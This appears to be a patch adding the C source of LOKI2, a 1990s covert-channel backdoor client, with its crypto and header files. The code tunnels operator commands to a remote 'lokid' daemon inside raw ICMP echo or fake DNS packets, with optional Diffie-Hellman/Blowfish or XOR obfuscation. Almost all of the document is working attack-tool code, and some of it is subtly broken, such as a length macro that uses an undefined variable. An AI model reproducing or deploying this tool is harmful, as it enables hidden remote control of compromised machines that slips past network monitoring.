+    BN_set_word((BIGNUM *)(dh -> g), DH_GENERATOR_5);
+                                        /* Generate the key pair */
+    if (!DH_generate_key(dh)) return ((DH *)NULL);
+
+    return(dh);
+}
+
+
+/*
+ *  Extract blowfish key from the DH shared secret.  A simple MD5 hash is
+ *  perfect as it will return the 16-bytes we want, and obscure any possible
+ *  redundancies or key-bit leaks in the DH shared secret.
+ */
+
+
+u_char *extract_bf_key(u_char *dh_shared_secret, int set_bf)
+{
+
+    u_char digest[MD5_HASHSIZE]; 
+    unsigned len = BN2BIN_SIZE; 
+    MD5_CTX context; 
+                                        /* initialize MD5 (loads magic context
+                                         * constants)
+                                         */
+    MD5Init(&context);
+                                        /* MD5 hashing */
+    MD5Update(&context, dh_shared_secret, len);
+                                        /* clean up of MD5 */
+    MD5Final(digest, &context);
+    bcopy(digest, user_key, BF_KEYSIZE);
+                                        /* In the server we dunot set the key 
+                                         * right away; they are set when they
+                                         * are nabbed from the client list.
+                                         */
+    if (set_bf == OK)
+    { 
+        BF_set_key(&bf_key, BF_KEYSIZE, user_key);
+        return ((u_char *)NULL);
+    }
+    else return (strdup(user_key));
+}
+#endif
+#ifdef WEAK_CRYPTO
+
+/*
+ *  Simple XOR obfuscation.
+ *
+ *  ( Syko was right -- the following didn't work under certain compilation 
+ *  environments...  Never write code in which the order of evaluation defines
+ *  the result.  See K&R page 53, at the bottom... )
+ *
+ *  if (!m) while (i < bs) t[i] ^= t[i++ +1];
+ *  else
+ *  {
+ *      i = bs;
+ *      while (i) t[i - 1] ^= t[i--];
+ *  }
+ * 
+ */
+
+void blur(int m, int bs, u_char *t)
+{
+
+    int i = 0;
+
+    if (!m)
+    {                           /* Encrypt */
+        while (i < bs)
+        {
+            t[i] ^= t[i + 1];
+            i++;
+        }
+    }
+    else
+    {                           /* Decrypt */
+        i = bs;
+        while (i)
+        {
+            t[i - 1] ^= t[i];
+            i--;
+        }
+    }
+}
+
+#endif
+#ifdef NO_CRYPTO
+
+/*
+ *  No encryption
+ */
+
+void blur(int m, int bs, u_char *t){}
+
+#endif
+
+/* EOF */
+<--> crypt.c
+<++> L2/crypt.h
+/*
+ * LOKI
+ *
+ * crypt header file
+ *
+ *  1996/7 Guild Corporation Productions    [daemon9]
+ */
+ 
+
+#ifdef STRONG_CRYPTO
+/* 384-bit strong prime */
+
+u_char modulus[] = 
+{
+
+0xDA, 0xE1, 0x01, 0xCD, 0xD8, 0xC9, 0x70, 0xAF, 0xC2, 0xE4, 0xF2, 0x7A,
+0x41, 0x8B, 0x43, 0x39, 0x52, 0x9B, 0x4B, 0x4D, 0xE5, 0x85, 0xF8, 0x49,
+0x03, 0xA9, 0x66, 0x2C, 0xC0, 0x8A, 0xA6, 0x58, 0x3E, 0xCB, 0x72, 0x14,
+0xA7, 0x75, 0xDB, 0x42, 0xFC, 0x3E, 0x4D, 0xDF, 0xB9, 0x24, 0xC8, 0xB3,
+
+};
+#endif
+<--> crypt.h
+<++> L2/loki.c
+/*
+ * LOKI2
+ *
+ * [ loki.c ]
+ *
+ *  1996/7 Guild Corporation Worldwide      [daemon9]
+ */
+
+
+#include "loki.h"
+
+jmp_buf env;
+struct loki sdg, rdg;
+int verbose     = OK, cflags = 0, ripsock = 0, tsock = 0;
+u_long p_read   = 0;                    /* packets read */
+
+
+#ifdef  STRONG_CRYPTO
+DH *dh_keypair = NULL;                  /* DH public and private keypair */
+extern u_short ivec_salt;
+#endif
+ 
+
+int main(int argc, char *argv[])
+{
+
+    static int prot         = IPPROTO_ICMP, one = 1, c = 0;
+#ifdef  STRONG_CRYPTO
+    static int established  = 0, retran = 0;
+#endif
+    static u_short loki_id  = 0;
+    int timer               = MIN_TIMEOUT;
+    u_char buf[BUFSIZE]     = {0};
+    struct protoent *pprot  = 0;
+    struct sockaddr_in sin;
+                                        /* Ensure we have proper permissions */
+    if (getuid() || geteuid()) err_exit(1, 1, verbose, L_MSG_NOPRIV);
+    loki_id = getpid();                 /* Allows us to individualize each  
+                                         * same protocol loki client session
+                                         * on a given host.  
+                                         */
+    bzero((struct sockaddr_in *)&sin, sizeof(sin));
+    while ((c = getopt(argc, argv, "v:d:t:p:")) != EOF)
+    {
+        switch (c)
+        {
+            case 'v':                   /* change verbosity */
+                verbose = atoi(optarg);
+                break;
+
+            case 'd':                   /* destination address of daemon */
+                strncpy(buf, optarg, BUFSIZE - 1);
+                sin.sin_family      = AF_INET;
+                sin.sin_addr.s_addr = name_resolve(buf);                 
+                break;
+
+            case 't':                   /* change alarm timer */
+                if ((timer = atoi(optarg)) < MIN_TIMEOUT)
+                     err_exit(1, 0, 1, "Invalid timeout.\n");
+                break;
+                                        
+            case 'p':                   /* select transport protocol */
+                switch (optarg[0])
+                {
+                    case 'i':           /* ICMP_ECHO / ICMP_ECHOREPLY */
+                        prot = IPPROTO_ICMP;
+                        break;
+
+                    case 'u':           /* DNS query / reply */
+                        prot = IPPROTO_UDP;
+                        break;
+
+                    default:
+                        err_exit(1, 0, verbose, "Unknown transport.\n");
+                }
+                break;
+ 
+            default:
+                err_exit(0, 0, 1, C_MSG_USAGE);
+        }
+    }
+                                        /* we need a destination address */
+    if (!sin.sin_addr.s_addr) err_exit(0, 0, verbose, C_MSG_USAGE);
+    if ((tsock = socket(AF_INET, SOCK_RAW, prot)) < 0)
+        err_exit(1, 1, 1, L_MSG_SOCKET);
+
+#ifdef  STRONG_CRYPTO                   /* ICMP only with strong crypto */
+    if (prot != IPPROTO_ICMP) err_exit(0, 0, verbose, L_MSG_ICMPONLY);
+#endif
+                                        /* Raw socket to build packets */
+    if ((ripsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
+         err_exit(1, 1, verbose, L_MSG_SOCKET);
+#ifdef  DEBUG
+    fprintf(stderr, "\nRaw IP socket: ");
+    fd_status(ripsock, OK);
+#endif
+
+#ifdef  IP_HDRINCL
+    if (setsockopt(ripsock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0)
+        if (verbose) perror("Cannot set IP_HDRINCL socket option");
+#endif
+                                        /* register packet dumping function
+                                         * to be called upon exit 
+                                         */
+    if (atexit(packets_read) == -1) err_exit(1, 1, verbose, L_MSG_ATEXIT);
+ 
+    fprintf(stderr, L_MSG_BANNER);
+    for (; ;)
+    {
+#ifdef  STRONG_CRYPTO
+                                        /* Key negotiation phase.  Before we
+                                         * can do anything, we need to share 
+                                         * a secret with the server.  This
+                                         * is our key management phase.  
+                                         * After this is done, we are 
+                                         * established.  We try MAX_RETRAN 
+                                         * times to contact a  server.
+                                         */
+        if (!established)
+        {                                    
+                                        /* Generate the DH parameters and public
+                                         * and private keypair
+                                         */
+            if (!dh_keypair)
+            {
+                if (verbose) fprintf(stderr, "\nloki: %s", L_MSG_DHKEYGEN);
+                if (!(dh_keypair = generate_dh_keypair()))
+                    err_exit(1, 0, verbose, L_MSG_DHKGFAIL);
+            }
+            if (verbose) fprintf(stderr, "\nloki: submiting our public key to server");
+                                        /* convert the BIGNUM public key
+                                         * into a big endian byte string
+                                         */
+            bzero((u_char *)buf, BUFSIZE);
+            BN_bn2bin((BIGNUM *)dh_keypair -> pub_key, buf);
+                                        /* Submit our key and request to
+                                         * the server (in one packet)
+                                         */
+            if (verbose) fprintf(stderr, C_MSG_PKREQ);
+            loki_xmit(buf, loki_id, prot, sin, L_PK_REQ);
+        }
+        else
+        {
+#endif
+            bzero((u_char *)buf, BUFSIZE);
+            fprintf(stderr, PROMPT);        /* prompt user for input */
+            read(STDIN_FILENO, buf, BUFSIZE - 1);
+            buf[strlen(buf)] = 0;
+                                            /* Nothing to parse */
+            if (buf[0] == '\n') continue;   /* Escaped command */
+            if (buf[0] == '/') if ((!c_parse(buf, &timer))) continue;
+                                        /* Send request to server */
+            loki_xmit(buf, loki_id, prot, sin, L_REQ);
+#ifdef  STRONG_CRYPTO
+        }
+#endif
+                                        /* change transports */
+        if (cflags & NEWTRANS)
+        {
+            close(tsock);
+            prot = (prot == IPPROTO_UDP) ? IPPROTO_ICMP : IPPROTO_UDP;
+            if ((tsock = socket(AF_INET, SOCK_RAW, prot)) < 0)
+                 err_exit(1, 1, verbose, L_MSG_SOCKET);
+
+            pprot = getprotobynumber(prot);
+            if (verbose) fprintf(stderr, "\nloki: Transport protocol changed to %s.\n", pprot -> p_name);
+            cflags &= ~NEWTRANS;
+            continue;
+        }
+        if (cflags & TERMINATE)         /* client should exit */
+        {
+            fprintf(stderr, "\nloki: clean exit\nroute [guild worldwide]\n");  
+            clean_exit(0);
+        }
+                                        /* Clear TRAP and VALID PACKET flags */
+        cflags &= (~TRAP & ~VALIDP);    
+                                        /* set alarm singal handler */
+        if (signal(SIGALRM, catch_timeout) == SIG_ERR)
+            err_exit(1, 1, verbose, L_MSG_SIGALRM);
+                                        /* returns true if we land here as the 
+                                         * result of a longjmp() -- IOW the 
+                                         * alarm timer went off
+                                         */
+        if (setjmp(env))
+        {
+            fprintf(stderr, "\nAlarm.\n%s", C_MSG_TIMEOUT);
+            cflags |= TRAP;
+#ifdef  STRONG_CRYPTO
+            if (!established)           /* No connection established yet */
+                if (++retran == MAX_RETRAN) err_exit(1, 0, verbose, "[fatal] cannot contact server.  Giving up.\n");
+                else if (verbose) fprintf(stderr, "Resending...\n");
+#endif
+        }
+        while (!(cflags & TRAP))
+        {                               /* TRAP will not be set unless the 
+                                         * alarm timer expires or we get
+                                         * an EOT packet 
+                                         */
+           alarm(timer);                /* block until alarm or read */
+
+           if ((c = read(tsock, (struct loki *)&rdg, LOKIP_SIZE)) < 0)
+                perror("[non fatal] network read error"); 
+
+            switch (prot)
+            {                           /* Is this a valid Loki packet? */
+                case IPPROTO_ICMP:
+                    if ((IS_GOOD_ITYPE_C(rdg))) cflags |= VALIDP;
+                    break;
+
+                case IPPROTO_UDP:
+                    if ((IS_GOOD_UTYPE_C(rdg))) cflags |= VALIDP;
+                    break;
+
+                default:
+                    err_exit(1, 0, verbose, L_MSG_WIERDERR);
+            }
+            if (cflags & VALIDP)
+            {
+#ifdef  DEBUG
+        fprintf(stderr, "\n[DEBUG]\t\tloki: packet read %d bytes, type: ", c);
+        PACKET_TYPE(rdg);
+        DUMP_PACKET(rdg, c);
+#endif
+                                        /* we have a valid packet and can
+                                         * turn off the alarm timer
+                                         */
+                alarm(0);
+                switch (rdg.payload[0]) /* determine packet type */
+                {
+                    case L_REPLY :      /* standard reply packet */
+                        bcopy(&rdg.payload[1], buf, BUFSIZE - 1);
+                        blur(DECR, BUFSIZE - 1, buf);
+#ifndef DEBUG
+                        fprintf(stderr, "%s", buf);
+#endif
+                        p_read++;
+                        break;
+
+                    case L_EOT :        /* end of transmission packet */
+                        cflags |= TRAP;
+                        p_read++;
+                        break;
+
+                    case L_ERR :        /* error msg packet (not encrypted) */
+                        bcopy(&rdg.payload[1], buf, BUFSIZE - 1);
+                        fprintf(stderr, "%s", buf);
+#ifdef  STRONG_CRYPTO
+                                        /* If the connection is not established
+                                         * we exit upon receipt of an error
+                                         */
+                        if (!established) clean_exit(1);
+#endif
+                        break;
+#ifdef  STRONG_CRYPTO
+                    case L_PK_REPLY :   /* public-key receipt */
+                        if (verbose) fprintf(stderr, C_MSG_PKREC);
+                                        /* compute DH key parameters */
+                        DH_compute_key(buf, (void *)BN_bin2bn(&rdg.payload[1], BN2BIN_SIZE, NULL), dh_keypair);
+                                        /* extract blowfish key from the
+                                         * DH shared secret.  
+                                         */
+                        if (verbose) fprintf(stderr, C_MSG_SKSET);
+                        extract_bf_key(buf, OK);
+                        established = OK;
+                        break;
+#endif
+                    case L_QUIT:        /* termination directive packet */
+                        fprintf(stderr, C_MSG_MUSTQUIT);
+                        clean_exit(0);
+
+                    default :
+                        fprintf(stderr, "\nUnknown LOKI packet type");
+                        break;
+                }
+                cflags &= ~VALIDP;      /* reset VALID PACKET flag */
+            }
+        }
+    }
+    return (0);
+}
+
+
+/*
+ *  Build and transmit Loki packets (client version)
+ */
+
+void loki_xmit(u_char *payload, u_short loki_id, int prot, struct sockaddr_in sin, int ptype)
+{
+
+    bzero((struct loki *)&sdg, LOKIP_SIZE);
+                                        /* Encrypt and load payload, unless
+                                         * we are doing key management
+                                         */
+    if (ptype != L_PK_REQ)
+    {
+#ifdef  STRONG_CRYPTO
+        ivec_salt++;
+#endif
+        blur(ENCR, BUFSIZE - 1, payload);
+    }
+    bcopy(payload, &sdg.payload[1], BUFSIZE - 1);
+
+    if (prot == IPPROTO_ICMP)
+    {
+#ifdef  NET3                                            /* Our workaround. */
+        sdg.ttype.icmph.icmp_type   = ICMP_ECHOREPLY;
+#else
+        sdg.ttype.icmph.icmp_type   = ICMP_ECHO;
+#endif
+        sdg.ttype.icmph.icmp_code   = (int)NULL;
+        sdg.ttype.icmph.icmp_id     = loki_id;          /* Session ID */
+        sdg.ttype.icmph.icmp_seq    = L_TAG;            /* Loki ID */
+        sdg.payload[0]              = ptype;
+        sdg.ttype.icmph.icmp_cksum  = 
+             i_check((u_short *)&sdg.ttype.icmph, BUFSIZE + ICMPH_SIZE);
+    }
+    if (prot == IPPROTO_UDP)
+    {
+        sdg.ttype.udph.uh_sport     = loki_id;
+        sdg.ttype.udph.uh_dport     = NL_PORT;
+        sdg.ttype.udph.uh_ulen      = htons(UDPH_SIZE + BUFSIZE);
+        sdg.payload[0]              = ptype;
+        sdg.ttype.udph.uh_sum       = 
+             i_check((u_short *)&sdg.ttype.udph, BUFSIZE + UDPH_SIZE);
+    }
+    sdg.iph.ip_v    = 0x4;
+    sdg.iph.ip_hl   = 0x5;
+    sdg.iph.ip_len  = FIX_LEN(LOKIP_SIZE);
+    sdg.iph.ip_ttl  = 0x40;
+    sdg.iph.ip_p    = prot;
+    sdg.iph.ip_dst  = sin.sin_addr.s_addr;
+    
+    if ((sendto(ripsock, (struct loki *)&sdg, LOKIP_SIZE, (int)NULL, (struct sockaddr *) &sin, sizeof(sin)) < LOKIP_SIZE))
+    {
+        if (verbose) perror("[non fatal] truncated write");
+    }
+}
+
+
+/*
+ *  help is here
+ */
+
+void help()
+{
+
+    fprintf(stderr,"
+    %s\t\t-  you are here
+    %s xx\t\t-  change alarm timeout to xx seconds (minimum of %d)
+    %s\t\t-  query loki server for client statistics 
+    %s\t\t-  query loki server for all client statistics 
+    %s\t\t-  swap the transport protocol ( UDP <-> ICMP ) [in beta]
+    %s\t\t-  quit the client
+    %s\t\t-  quit this client and kill all other clients (and the server)
+    %s dest\t\t-  proxy to another server    [ UNIMPLIMENTED ]
+    %s dest\t-  redirect to another client [ UNIMPLIMENTED ]\n",
+
+    HELP, TIMER, MIN_TIMEOUT, STAT_C, STAT_ALL, SWAP_T, QUIT_C, QUIT_ALL, PROXY_D, REDIR_C);
+}
+
+
+/*
+ *  parse escaped commands
+ */
+
+int c_parse(u_char *buf, int *timer)
+{
+
+    cflags &= ~VALIDC;
+                                        /* help */
+    if (!strncmp(buf, HELP, sizeof(HELP) - 1) || buf[1] == '?')
+    {
+        help();
+        return (NOK);
+    }
+                                        /* change alarm timer */
+    else if (!strncmp(buf, TIMER, sizeof(TIMER) - 1))
+    {
+        cflags |= VALIDC;
+        (*timer) = atoi(&buf[sizeof(TIMER) - 1]) > MIN_TIMEOUT ? atoi(&buf[sizeof(TIMER) - 1]) : MIN_TIMEOUT;
+        fprintf(stderr, "\nloki: Alarm timer changed to %d seconds.", *timer);
+        return (NOK);
+    }
+                                        /* Quit client, send notice to server */
+    else if (!strncmp(buf, QUIT_C, sizeof(QUIT_C) - 1))
+        cflags |= (TERMINATE | VALIDC);
+                                        /* Quit client, send kill to server */
+    else if (!strncmp(buf, QUIT_ALL, sizeof(QUIT_ALL) - 1))
+        cflags |= (TERMINATE | VALIDC);
+                                        /* Request server-side statistics */
+    else if (!strncmp(buf, STAT_C, sizeof(STAT_C) - 1))
+        cflags |= VALIDC;
+                                        /* Swap transport protocols */
+    else if (!strncmp(buf, SWAP_T, sizeof(SWAP_T) - 1))
+    {
+                                        /* When using strong crypto we do not
+                                         * want to swap protocols.
+                                         */
+#ifdef  STRONG_CRYPTO
+        fprintf(stderr, C_MSG_NOSWAP);
+        return (NOK);
+#elif   !(__linux__)
+        fprintf(stderr, "\nloki: protocol swapping only supported in Linux\n");
+        return (NOK);
+#else
+        cflags |= (NEWTRANS | VALIDC);
+#endif
+
+    }
+                                        /* Request server to redirect output
+                                         * to another LOKI client 
+                                         */ 
+    else if (!strncmp(buf, REDIR_C, sizeof(REDIR_C) - 1))
+        cflags |= (REDIRECT | VALIDC);        
+                                        /* Request server to simply proxy 
+                                         * requests to another LOKI server
+                                         */   
+    else if (!strncmp(buf, PROXY_D, sizeof(PROXY_D) - 1))
+        cflags |= (PROXY | VALIDC);        
+
+                                        /* Bad command trap */
+    if (!(cflags & VALIDC))
+    {
+        fprintf(stderr, "Unrecognized command %s\n",buf);
+        return (NOK);
+    }
+
+    return (OK);  
+}
+
+
+/*
+ *  Dumps packets read by client... 
+ */
+
+void packets_read()
+{
+    fprintf(stderr, "Packets read: %ld\n", p_read);
+}
+
+/* EOF */
+<--> loki.c
+<++> L2/loki.h
+#ifndef  __LOKI_H__
+#define  __LOKI_H__     
+
+/*
+ * LOKI
+ *
+ * loki header file
+ *
+ *  1996/7 Guild Corporation Productions    [daemon9]
+ */
+ 
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <pwd.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <fcntl.h>
+#include <time.h>
+#include <grp.h>
+#include <termios.h>
+#include <sys/ipc.h>
+#include <sys/sem.h>
+#include <sys/shm.h>
+#include <setjmp.h>
+
+#ifdef LINUX
+#include <linux/icmp.h>
+#include <linux/ip.h>
+#include <linux/signal.h>
+                                    /* BSDish nomenclature */
+#define ip          iphdr
+#define ip_v        version
+#define ip_hl       ihl
+#define ip_len      tot_len
+#define ip_ttl      ttl
+#define ip_p        protocol
+#define ip_dst      daddr
+#define ip_src      saddr
+#endif
+
+#ifdef BSD4 
+#include <netinet/in_systm.h>
+#include <netinet/ip_var.h>
+#include <netinet/ip.h> 
+#include <netinet/tcp.h>
+#include <netinet/tcpip.h>
+#include <netinet/ip_icmp.h>
+#include <netinet/icmp_var.h>
+#include <sys/sockio.h>
+#include <sys/termios.h>
+#include <sys/signal.h>
+
+#undef  icmp_id
+#undef  icmp_seq
+#define ip_dst      ip_dst.s_addr
+#define ip_src      ip_src.s_addr
+#endif
+
+#ifdef SOLARIS
+#include <netinet/in_systm.h>
+#include <netinet/in.h>
+#include <netinet/ip_var.h>
+#include <netinet/ip.h> 
+#include <netinet/tcp.h>
+#include <netinet/tcpip.h>
+#include <netinet/ip_icmp.h>
+#include <netinet/icmp_var.h>
+#include <sys/sockio.h>
+#include <sys/termios.h>
+#include <sys/signal.h>
+#include <strings.h>
+#include <unistd.h> 
+
+#undef  icmp_id
+#undef  icmp_seq
+#define ip_dst      ip_dst.s_addr
+#define ip_src      ip_src.s_addr
+#endif
+
+#ifdef BROKEN_IP_LEN 
+#define FIX_LEN(n)  (x)         /* FreeBSD needs this  */
+#else
+#define FIX_LEN(n)  htons(n)
+#endif
+
+
+/*
+ *  Net/3 will not pass ICMP_ECHO packets to user processes. 
+ */
+
+#ifdef NET3
+#define D_P_TYPE    ICMP_ECHO
+#define C_P_TYPE    ICMP_ECHOREPLY
+#else
+#define D_P_TYPE    ICMP_ECHOREPLY
+#define C_P_TYPE    ICMP_ECHO
+#endif
+
+#ifdef STRONG_CRYPTO
+#include "/usr/local/ssl/include/blowfish.h"
+#include "/usr/local/ssl/include/bn.h"
+#include "/usr/local/ssl/include/dh.h"
+#include "/usr/local/ssl/include/buffer.h"
+
+#define BF_KEYSIZE      16  /* blowfish key in bytes                    */
+#define IVEC_SIZE       7   /* I grabbed this outta thin air.           */
+#define BN2BIN_SIZE     48  /* bn2bin byte-size of 384-bit prime        */
+#endif
+
+#ifdef  STRONG_CRYPTO
+#define CRYPTO_TYPE "blowfish"
+#endif
+#ifdef  WEAK_CRYPTO
+#define CRYPTO_TYPE "XOR"
+#endif
+#ifdef  NO_CRYPTO 
+#define CRYPTO_TYPE "none"
+#endif
+
+
+/* Start user configurable options */
+
+#define MIN_TIMEOUT 3       /* minimum client-side alarm timeout        */
+#define MAX_RETRAN  3       /* maximum client-side timeout/retry amount */
+#define MAX_CLIENT  0xa     /* maximum server-side client count         */
+#define KEY_TIMER   0xe10   /* maximum server-side idle client TTL      */
+
+/* End user configurable options */
+
+
+
+#define VERSION     "2.0"
+#define BUFSIZE     0x38    /* We build packets with a fixed payload. 
+                             * Fine for ICMP_ECHO/ECHOREPLY packets as they
+                             * often default to a 56 byte payload.  However
+                             * DNS query/reply packets have no set size and
+                             * are generally oddly sized with no padding.
+                             */
+
+#define ICMPH_SIZE  8
+#define UDPH_SIZE   8
+#define NL_PORT     htons(0x35)
+
+#define PROMPT      "loki> "
+#define ENCR        1       /* symbolic for encrypt             */
+#define DECR        0       /* symbolic for decrypt             */
+#define NOCR        1       /* don't encrypt this packet        */
+#define OKCR        0       /* encrypt this packet              */
+#define OK          1       /* Positive acknowledgement         */
+#define NOK         0       /* Negative acknowledgement         */
+#define NNOK        -1      /* Really negative acknowledgement  */
+#define FIND        1       /* Controls locate_client           */
+#define DESTROY     2       /*  disposition                     */
+
+/*  LOKI packet type symbolics */
+
+#define L_TAG       0xf001  /* Tags packets as LOKI             */
+#define L_PK_REQ    0xa1    /* Public Key request packet        */
+#define L_PK_REPLY  0xa2    /* Public Key reply packet          */
+#define L_EOK       0xa3    /* Encrypted ok                     */
+#define L_REQ       0xb1    /* Standard reuqest packet          */
+#define L_REPLY     0xb2    /* Standard reply packet            */
+#define L_ERR       0xc1    /* Error of some kind               */
+#define L_ACK       0xd1    /* Acknowledgement                  */
+#define L_QUIT      0xd2    /* Receiver should exit             */
+#define L_EOT       0xf1    /* End Of Transmission packet       */
+
+/*  Packet type printing macro */
+
+#ifdef DEBUG
+#define PACKET_TYPE(ldg)\
+\
+if      (ldg.payload[0]   == 0xa1) fprintf(stderr, "Public Key Request");  \
+else if (ldg.payload[0]   == 0xa2) fprintf(stderr, "Public Key Reply");    \
+else if (ldg.payload[0]   == 0xa3) fprintf(stderr, "Encrypted OK");        \
+else if (ldg.payload[0]   == 0xb1) fprintf(stderr, "Client Request");      \
+else if (ldg.payload[0]   == 0xb2) fprintf(stderr, "Server Reply");        \
+else if (ldg.payload[0]   == 0xc1) fprintf(stderr, "Error");               \
+else if (ldg.payload[0]   == 0xd1) fprintf(stderr, "ACK");                 \
+else if (ldg.payload[0]   == 0xd2) fprintf(stderr, "QUIT");                \
+else if (ldg.payload[0]   == 0xf1) fprintf(stderr, "Server EOT");          \
+else                               fprintf(stderr, "Unknown");             \
+if      (prot == IPPROTO_ICMP)     fprintf(stderr, ", ICMP type: %d\n", ldg.ttype.icmph.icmp_type);\
+else                               fprintf(stderr, "\n");\
+
+#define DUMP_PACKET(ldg, i)\
+\
+for (i = 0; i < BUFSIZE; i++)      fprintf(stderr, "0x%x ",ldg.payload[i]); \
+fprintf(stderr, "\n");\
+
+#endif
+
+
+/*  
+ *  Escaped commands (not interpreted by the shell)
+ */
+
+#define HELP        "/help"         /* Help me                      */
+#define TIMER       "/timer"        /* Change the client side timer */
+#define QUIT_C      "/quit"         /* Quit the client              */
+#define QUIT_ALL    "/quit all"     /* Kill all clients and server  */
+#define STAT_C      "/stat"         /* Stat the client              */
+#define STAT_ALL    "/stat all"     /* Stat all the clients         */
+#define SWAP_T      "/swapt"        /* Swap protocols               */
+#define REDIR_C     "/redirect"     /* Redirect to another client   */
+#define PROXY_D     "/proxy"        /* Proxy to another server      */
+
+/*
+ *  Control flag symbolics 
+ */
+
+#define TERMINATE   0x01
+#define TRAP        0x02
+#define VALIDC      0x04
+#define VALIDP      0x08
+#define NEWTRANS    0x10
+#define REDIRECT    0x20
+#define PROXY       0x40
+#define SENDKILL    0x80
+
+
+/*
+ *  Message Strings
+ *  L_ == common to both server and client
+ *  S_ == specific to server
+ *  C_ == specific to client
+ */
+
+#define L_MSG_BANNER    "\nLOKI2\troute [(c) 1997 guild corporation worldwide]\n"
+#define L_MSG_NOPRIV    "\n[fatal] invalid user identification value"
+#define L_MSG_SOCKET    "[fatal] socket allocation error"
+#define L_MSG_ICMPONLY  "\nICMP protocol only with strong cryptography\n"
+#define L_MSG_ATEXIT    "[fatal] cannot register with atexit(2)"
+#define L_MSG_DHKEYGEN  "generating Diffie-Hellman parameters and keypair"
+#define L_MSG_DHKGFAIL  "\n[fatal] Diffie-Hellman key generation failure\n"
+#define L_MSG_SIGALRM   "[fatal] cannot catch SIGALRM"
+#define L_MSG_SIGUSR1   "[fatal] cannot catch SIGUSR1"
+#define L_MSG_SIGCHLD   "[fatal] cannot catch SIGCHLD"
+#define L_MSG_WIERDERR  "\n[SUPER fatal] control should NEVER fall here\n"
+#define S_MSG_PACKED    "\nlokid: server is currently at capacity.  Try again later\n"
+#define S_MSG_UNKNOWN   "\nlokid: cannot locate client entry in database\n"
+#define S_MSG_UNSUP     "\nlokid: unsupported or unknown command string\n"
+#define S_MSG_ICMPONLY  "\nlokid: ICMP protocol only with strong cryptography\n"
+#define S_MSG_CLIENTK   "\nlokid: clean exit (killed at client request)\n"
+#define S_MSG_DUP       "\nlokid: duplicate client entry found, updating\n" 
+#define S_MSG_USAGE     "\nlokid -p (i|u) [ -v (0|1) ]\n"
+#define C_MSG_USAGE     "\nloki -d dest -p (i|u) [ -v (0|1) ] [ -t (n>3) ]\n"
+#define C_MSG_TIMEOUT   "\nloki: no response from server (expired timer)\n"
+#define C_MSG_NOSWAP    "\nloki: cannot swap protocols with strong crypto\n"
+#define C_MSG_PKREQ     "loki: requesting public from server\n" 
+#define C_MSG_PKREC     "loki: received public key, computing shared secret\n"
+#define C_MSG_SKSET     "loki: extracting and setting expanded blowfish key\n"
+#define C_MSG_MUSTQUIT  "\nloki: received termination directive from server\n"
+
+/*
+ *  Macros to evaluate packets to determine if they are LOKI or not.
+ *  These are UGLY.
+ */
+
+
+/*  
+ *  ICMP_ECHO client packet check 
+ */
+
+#define IS_GOOD_ITYPE_C(ldg)\
+\
+(i_check((u_short *)&ldg.ttype.icmph, BUFSIZE + ICMPH_SIZE) ==          0 &&\
+                                ldg.ttype.icmph.icmp_type   ==   D_P_TYPE &&\
+                                  ldg.ttype.icmph.icmp_id   ==    loki_id &&\
+                                 ldg.ttype.icmph.icmp_seq   ==      L_TAG &&\
+                                          (ldg.payload[0]   ==    L_REPLY ||\
+                                           ldg.payload[0]   == L_PK_REPLY ||\
+                                           ldg.payload[0]   ==      L_EOT ||\
+                                           ldg.payload[0]   ==     L_QUIT ||\
+                                           ldg.payload[0]   ==    L_ERR)) ==\
+                                                             (1) ? (1) : (0)\
+/*  
+ *  ICMP_ECHO daemon packet check 
+ */
+
+#define IS_GOOD_ITYPE_D(ldg)\
+\
+(i_check((u_short *)&ldg.ttype.icmph, BUFSIZE + ICMPH_SIZE) ==          0 &&\
+                                ldg.ttype.icmph.icmp_type   ==   C_P_TYPE &&\
+                                 ldg.ttype.icmph.icmp_seq   ==      L_TAG &&\
+                                          (ldg.payload[0]   ==      L_REQ ||\
+                                           ldg.payload[0]   ==     L_QUIT ||\
+                                           ldg.payload[0]   == L_PK_REQ)) ==\
+                                                             (1) ? (1) : (0)\
+/*  
+ *  UDP client packet check 
+ */
+
+#define IS_GOOD_UTYPE_C(ldg)\
+\
+(i_check((u_short *)&ldg.ttype.udph, BUFSIZE + UDPH_SIZE) ==              0 &&\
+                                ldg.ttype.udph.uh_sport   ==        NL_PORT &&\
+                                ldg.ttype.udph.uh_dport   == loki_id &&\
+                                        (ldg.payload[0]   ==        L_REPLY ||\
+                                         ldg.payload[0]   ==          L_EOT ||\
+                                         ldg.payload[0]   ==         L_QUIT ||\
+                                         ldg.payload[0]   ==        L_ERR)) ==\
+                                                               (1) ? (1) : (0)\
+/*  
+ *  UDP daemon packet check.  Yikes.  We need more info here. 
+ */
+
+#define IS_GOOD_UTYPE_D(ldg)\
+\
+(i_check((u_short *)&ldg.ttype.udph, BUFSIZE + UDPH_SIZE) ==              0 &&\
+                                ldg.ttype.udph.uh_dport   ==        NL_PORT &&\
+                                         (ldg.payload[0]  ==         L_QUIT ||\
+                                          ldg.payload[0]  ==        L_REQ)) ==\
+                                                               (1) ? (1) : (0)\
+/*
+ *  ICMP_ECHO / ICMP_ECHOREPLY header prototype
+ */
+
+struct icmp_echo
+{
+    u_char  icmp_type;          /* 1 byte type              */
+    u_char  icmp_code;          /* 1 byte code              */
+    u_short icmp_cksum;         /* 2 byte checksum          */
+    u_short icmp_id;            /* 2 byte identification    */
+    u_short icmp_seq;           /* 2 byte sequence number   */
+};
+
+
+/*
+ *  UDP header prototype
+ */
+
+struct udp
+{
+    u_short uh_sport;           /* 2 byte source port       */
+    u_short uh_dport;           /* 2 byte destination port  */
+    u_short uh_ulen;            /* 2 byte length            */
+    u_short uh_sum;             /* 2 byte checksum          */
+};
+        
+
+/*
+ *  LOKI packet prototype
+ */
+
+struct loki
+{
+    struct ip iph;              /* IP header    */
+    union
+    {
+        struct icmp_echo icmph; /* ICMP header  */
+        struct udp udph;        /* UDP header   */
+    }ttype;
+    u_char payload[BUFSIZE];    /* data payload */
+};
+
+#define LOKIP_SIZE      sizeof(struct loki)
+#define LP_DST          rdg.iph.ip_src
+
+void blur(int, int, u_char *);          /* Symmetric encryption function    */
+char *host_lookup(u_long);              /* network byte -> human readable   */
+u_long name_resolve(char *);            /* human readable -> network byte   */
